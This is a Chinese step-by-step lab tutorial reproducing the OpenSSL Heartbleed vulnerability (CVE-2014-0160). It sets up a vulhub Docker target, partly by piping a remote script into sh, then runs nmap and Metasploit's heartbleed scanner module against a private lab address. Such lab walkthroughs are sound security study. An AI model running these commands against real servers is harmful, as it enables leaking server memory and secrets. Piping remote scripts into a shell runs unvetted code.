当前位置:   article > 正文

OpenSSL 心脏滴血漏洞(CVE-2014-0160)漏洞复现(保姆级教学)_滴血 漏洞 复现

滴血 漏洞 复现

没有废话,直接开始复现

准备环境:

两台虚拟机:

靶机 Ubuntu 安装教程查看:安装Ubuntu虚拟机_乌班图镜像-CSDN博客

攻击机:kali

注意配置两台机器同一网段 可以相互ping通

复现步骤

部署靶机

  •  首先配置Ubuntu环境
  1. 1、安装docker:
  2. apt-get install -y docker.io
  3. 2、安装docker-compose:
  4. pip install docker-compose
  5. 3、配置 docker 加速器(提高容器下载速度):
  6. curl -sSL https://get.daocloud.io/daotools/set_mirror.sh | sh -s http://f1361db2.m.daocloud.io
  7. 3、下载vulhub漏洞目录:
  8. git clone https://github.com/vulhub/vulhub.git

  • 下载完成之后使用root用户查看root目录下的文件

此时已经可以看到vulhub 文件夹

  • 2. 输入以下命令
  1. cd ~/vulhub/openssl/CVE-2014-0160
  2. # 进入心脏滴血的漏洞文件夹
  • 输入命令
  1. docker-compose up -d
  2. #安装漏洞环境

  • 到这里靶机的环境就搭建完成了,如果不放心可以使用命令
  1. docker ps
  2. #查看运行状态

看到如下状态,就代表运行正常,接下来攻击

攻击

  • 使用kali 扫描
nmap -sV -T4 192.168.10.129

  • 打开msf

search heartbleed

  1. msf6 > use auxiliary/scanner/ssl/openssl_heartbleed
  2. msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 192.168.10.129
  3. rhosts => 192.168.10.129
  4. msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set rport 8443
  5. rport => 8443
  6. msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true
  7. verbose => true
  8. msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run

到这里,就攻击成功了

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/你好赵伟/article/detail/741429
推荐阅读
相关标签
  

闽ICP备14008679号